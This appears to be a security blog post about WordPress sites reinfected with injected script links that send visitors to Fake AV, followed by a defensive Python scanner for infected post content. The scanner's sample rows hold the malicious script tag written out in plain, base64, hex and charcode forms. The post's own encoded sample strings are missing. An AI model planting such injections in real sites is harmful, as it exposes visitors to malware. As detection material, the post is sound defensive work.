Today, we started to detect that a large number of those sites are being reinfected (and a bunch of new ones are getting hacked too) with a very similar malware string. The major difference is this time the links are pointing to http://lessthenaminutehandle.com/js.php?kk=33 (both hosted at 18.104.22.168).
This hack also injects the malware on every post in the database, but this time encoded as:
Which decodes to:
Unfortunately, the domain being used is not blacklisted by Google (or any AV), so the risk is high for every site visitor… If you want to verify your site to ensure it hasn’t been infected, you can scan it here: Sucuri SiteCheck
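Because the injected link was stored in every post in the database rather than only in theme files, a quick check is to scan the stored post content directly. The following is an added example, not Sucuri's own tooling: the domain and IP it looks for are the ones quoted above, but the encodings it unwraps (base64, \xNN hex escapes and String.fromCharCode sequences) are an assumption, since the encoded string itself is not reproduced in this post.

```python
import base64
import binascii
import re

# Indicators of compromise quoted in the post above.
IOC_DOMAIN = "lessthenaminutehandle.com"
IOC_IP = "18.104.22.168"
IOC_RE = re.compile(re.escape(IOC_DOMAIN) + "|" + re.escape(IOC_IP), re.IGNORECASE)

# Candidate obfuscated blobs.  Which encodings the injection actually used is
# an assumption here; these three are the common ones for injected JavaScript.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
HEX_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")
CHARCODE_RE = re.compile(r"fromCharCode\(\s*([0-9,\s]+)\)")


def _decoded_layers(text):
    """Yield (label, decoded_text) for every blob in text that decodes cleanly."""
    for blob in B64_RE.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue  # a long plain word, not base64
        yield "base64", raw.decode("latin-1")
    for blob in HEX_RE.findall(text):
        yield "hex", bytes.fromhex(blob.replace("\\x", "")).decode("latin-1")
    for codes in CHARCODE_RE.findall(text):
        nums = [int(n) for n in codes.split(",") if n.strip()]
        if all(0 <= n < 0x110000 for n in nums):
            yield "charcode", "".join(chr(n) for n in nums)


def find_indicators(content):
    """Return the forms ('plain', 'base64', 'hex', 'charcode') in which the
    known-bad domain or IP appears in one post's content; [] if clean."""
    forms = []
    if IOC_RE.search(content):
        forms.append("plain")
    for label, decoded in _decoded_layers(content):
        if IOC_RE.search(decoded) and label not in forms:
            forms.append(label)
    return forms


def scan_posts(posts):
    """posts: iterable of (post_id, post_content) rows, e.g. SELECT ID,
    post_content FROM wp_posts.  Returns {post_id: [forms]} for infected rows."""
    infected = {}
    for post_id, body in posts:
        forms = find_indicators(body)
        if forms:
            infected[post_id] = forms
    return infected


# Constructed sample rows (not real site data) exercising each encoding.
INJECT = '<script src="http://lessthenaminutehandle.com/js.php?kk=33"></script>'
SAMPLE_POSTS = [
    (1, "Hello world " + INJECT),
    (2, '<script>eval(atob("%s"))</script>'
        % base64.b64encode(INJECT.encode()).decode()),
    (3, 'document.write("%s")'
        % "".join("\\x%02x" % b for b in INJECT.encode())),
    (4, "<script>document.write(String.fromCharCode(%s))</script>"
        % ",".join(str(b) for b in INJECT.encode())),
    (5, "A clean post with a harmless link to https://example.org/"),
]

if __name__ == "__main__":
    for post_id, forms in scan_posts(SAMPLE_POSTS).items():
        print("post %d: indicator found via %s" % (post_id, ", ".join(forms)))
```

Run it against rows pulled from wp_posts (or any CMS table holding post bodies); any row reported should be cleaned and the site's admin credentials and files reviewed, since a database-only cleanup leaves the injection point in place.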
What happens when someone clicks an infected site?
They are redirected to one of the following sites where the infamous Fake AV is pushed to the user…
Here is the whois for the group responsible for that domain (not Hilary Kneber this time, but since they are using the same IP addresses and intermediary hosts, we assume it is all the same):
Jannet Degree firstname.lastname@example.org
+154654645234 fax: +154654645234
Jose Road 78
SanHose NA 64567
We will post more details as we learn more about it.
If your site is infected with malware and you need help, visit Sucuri, we’ll get you cleaned up.